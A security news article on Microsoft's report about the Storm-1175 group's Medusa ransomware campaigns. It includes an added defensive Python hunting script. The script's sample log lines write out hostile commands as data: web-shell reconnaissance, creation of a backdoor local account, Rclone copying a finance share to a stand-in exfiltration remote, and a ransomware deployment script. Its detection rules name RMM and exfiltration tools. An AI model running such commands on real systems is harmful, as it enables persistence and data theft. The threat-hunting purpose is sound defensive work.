New findings from Microsoft show that the threat actor Storm-1175 is intensifying high-tempo ransomware operations by aggressively targeting vulnerable, internet-facing systems as an initial entry point. The group, which deploys Medusa ransomware, has been observed exploiting critical flaws in public-facing applications to gain unauthenticated access, enabling rapid compromise of exposed environments and reinforcing a broader trend where external attack surface weaknesses are becoming the primary intrusion vector.
Once inside, Storm-1175 executes a multi-stage attack chain built for persistence and large-scale impact: deploying remote monitoring tools, conducting reconnaissance, and moving laterally across networks before exfiltrating data and launching ransomware payloads. Microsoft notes that these operations are opportunistic and fast-moving, combining legitimate administrative tools with stealth techniques to evade detection, and that unpatched web-facing assets are increasingly being weaponized to accelerate ransomware deployment and monetization.
Microsoft Threat Intelligence said that Storm-1175 operates high-velocity ransomware campaigns that weaponize N-day vulnerabilities (flaws that are already publicly disclosed, and usually patched, but not yet remediated everywhere), targeting vulnerable, web-facing systems in the window between vulnerability disclosure and widespread patch adoption. Following exploitation, Storm-1175 moves from initial access to data exfiltration and deployment of Medusa ransomware, often within a few days and, in some cases, within 24 hours.
The threat actor’s high operational tempo and proficiency in identifying exposed perimeter assets have proven effective: recent intrusions have heavily impacted healthcare organizations, as well as the education, professional services, and finance sectors in Australia, the U.K., and the U.S.
“The pace of Storm-1175’s campaigns is enabled by the threat actor’s consistent use of recently disclosed vulnerabilities to obtain initial access,” Microsoft Threat Intelligence researchers wrote in a Monday blog post. “While the threat actor typically uses N-day vulnerabilities, we have also observed Storm-1175 leveraging zero-day exploits, in some cases a full week before public vulnerability disclosure. The threat actor has also been observed chaining together multiple exploits to enable post-compromise activity.”
After initial access, Storm-1175 establishes persistence by creating new user accounts, deploys various tools, including remote monitoring and management software for lateral movement, conducts credential theft, and tampers with security solutions before deploying ransomware throughout the compromised environment.
Storm-1175 rapidly weaponizes newly disclosed vulnerabilities to gain initial access, showing a consistent pattern of exploiting internet-facing systems soon after flaws become public. Since 2023, Microsoft Threat Intelligence has observed the group leveraging more than 16 vulnerabilities across widely used enterprise technologies, including Microsoft Exchange, PaperCut, Ivanti Connect Secure and Policy Secure, ConnectWise ScreenConnect, JetBrains TeamCity, SimpleHelp, CrushFTP, GoAnywhere MFT, SmarterMail, and BeyondTrust, underscoring its focus on high-impact platforms to accelerate intrusion and ransomware deployment.
Furthermore, “Storm-1175 has also demonstrated a capability for targeting Linux systems as well: in late 2024, Microsoft Threat Intelligence identified the exploitation of vulnerable Oracle WebLogic instances across multiple organizations, though we were unable to identify the exact vulnerability being exploited in these attacks.”
The threat intelligence team also observed the use of at least three zero-day vulnerabilities, including, most recently, CVE-2026-23760 in SmarterMail, which was exploited by Storm-1175 the week prior to public disclosure, and CVE-2025-10035 in GoAnywhere Managed File Transfer, also exploited one week before public disclosure.
“While these more recent attacks demonstrate an evolved development capability or new access to resources like exploit brokers for Storm-1175, it is worth noting that GoAnywhere MFT has previously been targeted by ransomware attackers, and that the SmarterMail vulnerability was reportedly similar to a previously disclosed flaw; these factors may have helped to facilitate subsequent zero-day exploitation activity by Storm-1175, who still primarily leverages N-day vulnerabilities,” the post added.
During exploitation, Storm-1175 typically creates a web shell or drops a remote access payload to establish its initial hold in the environment. From this point, Microsoft Threat Intelligence has observed Storm-1175 moving from initial access to ransomware deployment in as little as one day, though many of the actor’s attacks have occurred over a period of five to six days.
Storm-1175 has also demonstrated a strong reliance on remote monitoring and management tools during post-compromise activity. Since 2023, the group has used multiple platforms including Atera RMM, Level RMM, N-able, DWAgent, MeshAgent, ConnectWise ScreenConnect, AnyDesk, and SimpleHelp to maintain persistence, enable remote access, and move laterally within compromised environments.
“In many attacks, Storm-1175 relies on PDQ Deployer, a legitimate software deployment tool that lets system administrators silently install applications, for both lateral movement and payload delivery, including ransomware deployment throughout the network,” the researchers detailed. “Additionally, Storm-1175 has leveraged Impacket for lateral movement. Impacket is a collection of open-source Python classes designed for working with network protocols, and it is popular with adversaries due to ease of use and wide range of capabilities.”
Like other ransomware-as-a-service (RaaS) offerings, Medusa operates a leak site to support double-extortion operations for its affiliates: attackers not only encrypt data but also steal it and hold it for ransom, threatening to publish the files if the ransom is not paid.
To that end, Storm-1175 often uses Bandizip to collect files and Rclone for data exfiltration. Data synchronization tools like Rclone allow threat actors to easily transfer large volumes of data to a remote, attacker-owned cloud resource. These tools also provide synchronization capabilities, pushing newly created or updated files to cloud storage in near real time, which enables continuous exfiltration throughout all stages of the attack without further attacker interaction.
Finally, having gained sufficient access throughout the network, Storm-1175 frequently leverages PDQ Deployer to launch a script (RunFileCopy[dot]cmd) and deliver Medusa ransomware payloads. In some cases, Storm-1175 has alternatively used highly privileged access to create a Group Policy update to broadly deploy ransomware.
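The post-compromise chain described in the preceding paragraphs (unapproved RMM agents, local account creation, a web server worker spawning a shell, Rclone pushing data to a cloud remote, and a deployment tool launching a .cmd script) translates directly into hunting rules over process-creation telemetry. The script below is an added, defender-side illustration of that hunt; it is not Microsoft's detection logic and not any product's rule set. The key=value event format, the field names, the RMM binary names, the parent-process names, the `exfil-remote:` Rclone remote and every sample event are constructed for the example.

```python
"""
Hunt for the Storm-1175 post-compromise tool chain in process-creation
events. Added illustration, not Microsoft's own detection logic: the
key=value log format, field names, binary names and sample events below
are all constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime

# Product keywords for the RMM tools the report says Storm-1175 has used.
# Matched as substrings of the process image name; real binary names vary
# by vendor and version, so map these to the names in your own telemetry.
RMM_KEYWORDS = ("atera", "level", "n-able", "nable", "dwagent", "meshagent",
                "screenconnect", "anydesk", "simplehelp")

# Web server worker processes whose children should never be shells.
WEB_WORKERS = {"w3wp.exe", "httpd", "nginx", "tomcat"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash"}

# key=value or key="quoted value" pairs (constructed log format).
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample telemetry for three hosts (not real events).
SAMPLE_LOG = r"""
ts=2026-01-10T08:12:03Z host=WEB01 parent=w3wp.exe image=cmd.exe cmdline="cmd.exe /c whoami"
ts=2026-01-10T08:15:41Z host=WEB01 parent=cmd.exe image=net.exe cmdline="net user svc_backup Passw0rd! /add"
ts=2026-01-10T09:02:17Z host=WEB01 parent=services.exe image=meshagent.exe cmdline="meshagent.exe -install"
ts=2026-01-11T14:30:05Z host=FS02 parent=services.exe image=screenconnect.clientservice.exe cmdline="screenconnect.clientservice.exe"
ts=2026-01-12T22:47:59Z host=FS02 parent=cmd.exe image=rclone.exe cmdline="rclone.exe copy D:\Shares\Finance exfil-remote:staging --transfers 32"
ts=2026-01-13T03:10:22Z host=FS02 parent=pdqdeployrunner.exe image=cmd.exe cmdline="cmd.exe /c \\DC01\share\RunFileCopy.cmd"
ts=2026-01-13T03:10:30Z host=WS17 parent=explorer.exe image=anydesk.exe cmdline="anydesk.exe"
"""


def parse_line(line):
    """Parse one key=value event line into a dict (quoted values may contain spaces)."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _KV.finditer(line)}


def classify(ev, approved_rmm=()):
    """Return [(rule, detail), ...] for one event; an event may trip several rules."""
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    cmd = ev.get("cmdline", "").lower()
    findings = []
    # 1. RMM agent that is not on the organisation's allowlist.
    for kw in RMM_KEYWORDS:
        if kw in image:
            if kw not in approved_rmm:
                findings.append(("unapproved_rmm", image))
            break
    # 2. Web server worker spawning a shell: the classic web shell footprint.
    if parent in WEB_WORKERS and image in SHELLS:
        findings.append(("webshell_child_process", f"{parent} -> {image}"))
    # 3. Local account creation, used by the actor for persistence.
    if image in ("net.exe", "net1.exe") and " user " in cmd and "/add" in cmd:
        findings.append(("local_account_created", cmd))
    # 4. Rclone copy/sync/move to a configured remote (name:path, not a drive letter).
    if "rclone" in image and re.search(r"\b(copy|sync|move)\b", cmd) \
            and re.search(r"\s[a-z0-9_-]{2,}:", cmd):
        findings.append(("rclone_exfil_to_remote", cmd))
    # 5. Deployment tool launching a .cmd script (the report names RunFileCopy.cmd).
    if "pdq" in parent and image in SHELLS and ".cmd" in cmd:
        findings.append(("deploy_tool_runs_script", cmd))
    return findings


def hunt(lines, approved_rmm=()):
    """Run every rule over the lines; return {host: [(ts, rule, detail), ...]} in time order."""
    approved = tuple(a.lower() for a in approved_rmm)
    by_host = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if "host" not in ev:
            continue
        for rule, detail in classify(ev, approved):
            by_host[ev["host"]].append((ev.get("ts", ""), rule, detail))
    return {host: sorted(f) for host, f in by_host.items()}


def prioritise(findings, min_stages=3):
    """Hosts on which at least min_stages distinct chain stages fired, most stages first."""
    ranked = [(len({r for _, r, _ in f}), h) for h, f in findings.items()]
    return [h for n, h in sorted(ranked, key=lambda x: (-x[0], x[1])) if n >= min_stages]


def dwell_hours(host_findings):
    """Hours between the first and last finding on one host."""
    stamps = [datetime.fromisoformat(ts.replace("Z", "+00:00")) for ts, _, _ in host_findings]
    return (max(stamps) - min(stamps)).total_seconds() / 3600


if __name__ == "__main__":
    hits = hunt(SAMPLE_LOG.splitlines(), approved_rmm=("screenconnect",))
    for host in prioritise(hits, min_stages=2):
        print(f"{host}: {len(hits[host])} findings over {dwell_hours(hits[host]):.1f} h")
        for ts, rule, detail in hits[host]:
            print(f"  {ts}  {rule:<24} {detail}")
```

The allowlist is the important knob: with ScreenConnect approved, the FS02 agent is silent while the MeshAgent and AnyDesk installs on the other hosts surface as unapproved RMM, which is exactly the "investigate any unauthorized deployments" step the report recommends. Ranking hosts by the number of distinct chain stages, rather than by raw alert count, keeps a single noisy rule from outranking a host where a web shell, a new account and an RMM agent appeared within an hour.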
To defend against Storm-1175 and similar ransomware activity, Microsoft emphasizes reducing exposure from internet-facing systems by continuously mapping the external attack surface and isolating critical assets behind secure network boundaries such as VPNs, firewalls, or segmented environments. Organizations are urged to prioritize patching vulnerabilities, enforce strong credential hygiene, and limit lateral movement through least-privilege access. Strengthening identity protection is also critical, including enabling features like Credential Guard early in deployment to prevent credential theft.
Microsoft further recommends hardening endpoint defenses by enabling tamper protection and always-on antivirus controls to prevent attackers from disabling security tools. Monitoring and controlling the use of remote monitoring and management software is essential, including enforcing multi-factor authentication for approved tools and investigating any unauthorized deployments.
Finally, organizations should adopt automated detection and response capabilities, such as attack disruption and attack surface reduction rules, to block common ransomware techniques like credential theft, obfuscated scripts, web shell creation, and misuse of administrative tools, thereby containing threats before they escalate.
